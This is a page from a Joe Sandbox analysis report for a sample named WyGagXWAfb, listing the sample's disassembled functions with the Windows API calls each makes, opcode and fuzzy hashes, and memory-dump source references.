Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: b63e039e063ad9b4398794cddf51d1fef56f8171996c7d20b9948efc045c5bf8
Instruction ID: 6500e0544635247725db34a169e856547a1459d9d29e7675003153d817bbf402
Opcode Fuzzy Hash: b63e039e063ad9b4398794cddf51d1fef56f8171996c7d20b9948efc045c5bf8
Instruction Fuzzy Hash: 3E313E72900108AFDB10EFA5C985AEFB7F9EF98300F5040AAE415E7251EA759E45CBA0

Function 00B9C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

GetCursorPos.USER32(?), ref: 00B9C7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B4BBFB,?,?,?,?,?), ref: 00B9C7D7
GetCursorPos.USER32(?), ref: 00B9C824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B4BBFB,?,?,?), ref: 00B9C85E

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 47f1ab20167b5d7c2942d421513d002cf545e7857fc9d13599c5eb9904590d12
Instruction ID: e74a907ea67eb788a9634dd7a74a8bf5619cb9cc22e862fbc585667ae1aefbac
Opcode Fuzzy Hash: 47f1ab20167b5d7c2942d421513d002cf545e7857fc9d13599c5eb9904590d12
Instruction Fuzzy Hash: 75313C75600018AFCF158F58C898EFABFE6EB49720F4441AAF9058B261D7359D50DBA0

Function 00B68B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B68652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B68669
Part of subcall function 00B68652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B68673
Part of subcall function 00B68652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B68682
Part of subcall function 00B68652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B68689
Part of subcall function 00B68652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B6869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00B68BEB
_memcmp.LIBCMT ref: 00B68C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B68C44
HeapFree.KERNEL32(00000000), ref: 00B68C4B

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: a04eeab49e735e7f513843bf934a786ad60d7808cf8dce5b0168874d0d72e641
Instruction ID: 144141a50607eae1bcdbbe7e8f5d907b6bbc0cbb9a4a58a1f6e56b85f3620516
Opcode Fuzzy Hash: a04eeab49e735e7f513843bf934a786ad60d7808cf8dce5b0168874d0d72e641
Instruction Fuzzy Hash: 39219D71E01209EFDB10DFA4C945BEEB7F8EF44354F144199E554A7240DB35AE06CBA0

Function 00B30BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00B30BF2

Part of subcall function 00B15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B77B20,?,?,00000000), ref: 00B15B8C
Part of subcall function 00B15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B77B20,?,?,00000000,?,?), ref: 00B15BB0

_fprintf.LIBCMT ref: 00B30C29
OutputDebugStringW.KERNEL32(?), ref: 00B66331

Part of subcall function 00B34CDA: _flsall.LIBCMT ref: 00B34CF3

__setmode.LIBCMT ref: 00B30C5E

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: c198408b9562e888f5562b2026a8907c433431a0814f189a530314c78cfb1b8b
Instruction ID: 000c3b727a8eb1e2d5246dcb862c99e6f8727b365182e5fd135aa276fcdf1dcf
Opcode Fuzzy Hash: c198408b9562e888f5562b2026a8907c433431a0814f189a530314c78cfb1b8b
Instruction Fuzzy Hash: 20110A32944208BECB0477B49C87AFEBBE9DF41320F6441DAF104572D1EF216D854795

Function 00B81A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B81A97

Part of subcall function 00B81B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B81B40
Part of subcall function 00B81B21: InternetCloseHandle.WININET(00000000), ref: 00B81BDD

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 9b362f881867611eb8836564c71a13f4303cf0087640f12ed91bf2703eb52aad
Instruction ID: 9bd4239f21b8886d90041913ad7a58201623dfd2f4c36e45d46bcc4a750df1b6
Opcode Fuzzy Hash: 9b362f881867611eb8836564c71a13f4303cf0087640f12ed91bf2703eb52aad
Instruction Fuzzy Hash: 2C21BE35202601BFDB16AF64CC40FBAB7EDFB44711F10085AFA1296660EB31D812DBA0

Function 00B6E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00B6E1C4,?,?,?,00B6EFB7,00000000,000000EF,00000119,?,?), ref: 00B6F5BC
Part of subcall function 00B6F5AD: lstrcpyW.KERNEL32(00000000,?,?,00B6E1C4,?,?,?,00B6EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00B6F5E2
Part of subcall function 00B6F5AD: lstrcmpiW.KERNEL32(00000000,?,00B6E1C4,?,?,?,00B6EFB7,00000000,000000EF,00000119,?,?), ref: 00B6F613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00B6EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00B6E1DD
lstrcpyW.KERNEL32(00000000,?,?,00B6EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00B6E203
lstrcmpiW.KERNEL32(00000002,cdecl,?,00B6EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00B6E237

Strings

cdecl, xrefs: 00B6E22E

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: ae184260c4637fb6acf461f7472050b8ef067281a04e0a969598abe78da127cd
Instruction ID: d201aa86ce937f1b691a667006c8bc9eb0a6ba510374dc3545a8640b43ddbb4e
Opcode Fuzzy Hash: ae184260c4637fb6acf461f7472050b8ef067281a04e0a969598abe78da127cd
Instruction Fuzzy Hash: 3911BE3A200301EFCB25AF74D845E7A77EAFF84350B40406AF816CB2A4EB75D85087A0

Function 00B45332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B45351

Part of subcall function 00B3594C: __FF_MSGBANNER.LIBCMT ref: 00B35963
Part of subcall function 00B3594C: __NMSG_WRITE.LIBCMT ref: 00B3596A
Part of subcall function 00B3594C: RtlAllocateHeap.NTDLL(010A0000,00000000,00000001,00000000,?,?,?,00B31013,?), ref: 00B3598F

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: c59ff1052872b13ebbf9dea385efce5a0b99a9a9b74fb6bb7491030dc2759434
Instruction ID: 5b29935de87f4c8adb75cec30b1b590ceb278a6fab5a11453e8e287c4c08f5cb
Opcode Fuzzy Hash: c59ff1052872b13ebbf9dea385efce5a0b99a9a9b74fb6bb7491030dc2759434
Instruction Fuzzy Hash: 9C11C132504F15AFCB312F74A84566A37D8AF103A0F2004BAF9469A192DF758E40A698

Function 00B14531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B14560

Part of subcall function 00B1410D: _memset.LIBCMT ref: 00B1418D
Part of subcall function 00B1410D: _wcscpy.LIBCMT ref: 00B141E1
Part of subcall function 00B1410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B141F1

KillTimer.USER32(?,00000001,?,?), ref: 00B145B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B145C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B4D6CE

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 39a489b89ac80c28873343814195dccf53712f8ae980079c04e160df4295ec3d
Instruction ID: 9e52b7d8864cb4bce533f36ee47ad901b1aa3f217aa471df94f5c629014488db
Opcode Fuzzy Hash: 39a489b89ac80c28873343814195dccf53712f8ae980079c04e160df4295ec3d
Instruction Fuzzy Hash: 6321D770904784AFEB328B24D895BE7BBEDDF11314F4400DEE69E97242C7B45A849B51

Function 00B8667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B77B20,?,?,00000000), ref: 00B15B8C
Part of subcall function 00B15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B77B20,?,?,00000000,?,?), ref: 00B15BB0

gethostbyname.WSOCK32(?,?,?), ref: 00B866AC
WSAGetLastError.WSOCK32(00000000), ref: 00B866B7
_memmove.LIBCMT ref: 00B866E4
inet_ntoa.WSOCK32(?), ref: 00B866EF

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 6daa8bc632d707e894e4ad43ff78288227c9fc8c97a7a32926bece42c0a215fe
Instruction ID: ac0f1b1a2cda6660cd84b143e4c827f1283618d44a4fc08f141813dd3841bd88
Opcode Fuzzy Hash: 6daa8bc632d707e894e4ad43ff78288227c9fc8c97a7a32926bece42c0a215fe
Instruction Fuzzy Hash: 62114935A00509EFCB04FFA4D996DEEB7F9AF44310B5480A5F502A71A1DF30AE44CBA1

Function 00B69023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00B69043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B69055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B6906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B69086

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e37c78ded2f013b66812cf62b282676b4c89bff5c109b596fb4a7d17876faddd
Instruction ID: 5ccd1cea5fce0e619308d46e2e7156c7fe3deb48fa10af64ad0db5f859b48924
Opcode Fuzzy Hash: e37c78ded2f013b66812cf62b282676b4c89bff5c109b596fb4a7d17876faddd
Instruction Fuzzy Hash: 28115A79900218FFEB10DFA5CD84EADBBB8FB48310F2040A5EA04B7290D6726E10DB90

Function 00B11290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

DefDlgProcW.USER32(?,00000020,?), ref: 00B112D8
GetClientRect.USER32(?,?), ref: 00B4B84B
GetCursorPos.USER32(?), ref: 00B4B855
ScreenToClient.USER32(?,?), ref: 00B4B860

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 0252cd00627207b5abcec0973c189f69a82ee1385e5652ca1ad3a01c0f37db90
Instruction ID: 7d22945933d974d2f4ebfe11e8f65b84d0ce4703e21c5ea3845bc0b06b3beece
Opcode Fuzzy Hash: 0252cd00627207b5abcec0973c189f69a82ee1385e5652ca1ad3a01c0f37db90
Instruction Fuzzy Hash: BF113A3590111AAFCF10DFA8D9859FE77F8EB05311F5008A6FA01E7250DB34BA91DBA5

Function 00B71652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B701FD,?,00B71250,?,00008000), ref: 00B7166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00B701FD,?,00B71250,?,00008000), ref: 00B71694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B701FD,?,00B71250,?,00008000), ref: 00B7169E
Sleep.KERNEL32(?,?,?,?,?,?,?,00B701FD,?,00B71250,?,00008000), ref: 00B716D1

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: a19c8bc0517bd0d89109ee96fcb9d26c801865112ffe6f997c8664c9209a1a89
Instruction ID: 3cf44f5ec3171160157985f93826b0fa1410e8c2300a0e1dfd5b2e7f3f20bfed
Opcode Fuzzy Hash: a19c8bc0517bd0d89109ee96fcb9d26c801865112ffe6f997c8664c9209a1a89
Instruction Fuzzy Hash: C5117031C0052DD7CF009FADD984AFEBBB8FF09751F058496E994B2140CB3095509BE5

Function 00B47207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00B4722B

Part of subcall function 00B47912: __fltout2.LIBCMT ref: 00B4793B

__cftog_l.LIBCMT ref: 00B47251
__cftoe_l.LIBCMT ref: 00B47283

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 822201ab190dd5abf59b869387ce65c56d55a6e3a399e2de632772a222d441fe
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: D4014E3608414ABBCF125E94CC418EE3FA2FF5A351B598695FA1858031DB76CAB1FB81

Function 00B9B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B9B59E
ScreenToClient.USER32(?,?), ref: 00B9B5B6
ScreenToClient.USER32(?,?), ref: 00B9B5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B9B5F5

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 1def485198601d896ed2a6b17adf2430a46e369a66b2c67877a67df996cfa38b
Instruction ID: 86086ef3c77df510e0149e65d446298a42878d7b92d0c0926560e280240b071c
Opcode Fuzzy Hash: 1def485198601d896ed2a6b17adf2430a46e369a66b2c67877a67df996cfa38b
Instruction Fuzzy Hash: C21123B5D0020AAFDB41CF99D544AAEBBB5FB18310F104166E914E3220D735AA55CB50

Function 00B9B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B9B8FE
_memset.LIBCMT ref: 00B9B90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00BD7F20,00BD7F64), ref: 00B9B93C
CloseHandle.KERNEL32 ref: 00B9B94E

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 356bb78f87c2bb2967799f446da51d893885606aa87011525dc2d86bb0f6e94a
Instruction ID: e1a038f788f3309c4947817fa313321218c13d73e3e4d20ee8aa98ff87516a74
Opcode Fuzzy Hash: 356bb78f87c2bb2967799f446da51d893885606aa87011525dc2d86bb0f6e94a
Instruction Fuzzy Hash: 2FF05EB26893417BE2206771AC55FFBBBDCEB08754F404062BA08D6292FF75490087A8

Function 00B76E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00B76E88

Part of subcall function 00B7794E: _memset.LIBCMT ref: 00B77983

_memmove.LIBCMT ref: 00B76EAB
_memset.LIBCMT ref: 00B76EB8
LeaveCriticalSection.KERNEL32(?), ref: 00B76EC8

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: f28300bab95743a264a7b504c00e0f6aadae866e72c18682486dff11bda73fbe
Instruction ID: d16a997bd7a4f1d9f310dbb4c1c4e024c67ebcdea072dfe24d424ff4f6057c5d
Opcode Fuzzy Hash: f28300bab95743a264a7b504c00e0f6aadae866e72c18682486dff11bda73fbe
Instruction Fuzzy Hash: A8F0543A100200BBCF016F55DD85B5ABB69EF45320F14C0A1FE089F216CB31A911CBB4

Function 00B9C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00B112F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B1134D
Part of subcall function 00B112F3: SelectObject.GDI32(?,00000000), ref: 00B1135C
Part of subcall function 00B112F3: BeginPath.GDI32(?), ref: 00B11373
Part of subcall function 00B112F3: SelectObject.GDI32(?,00000000), ref: 00B1139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B9C030
LineTo.GDI32(00000000,?,?), ref: 00B9C03D
EndPath.GDI32(00000000), ref: 00B9C04D
StrokePath.GDI32(00000000), ref: 00B9C05B

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

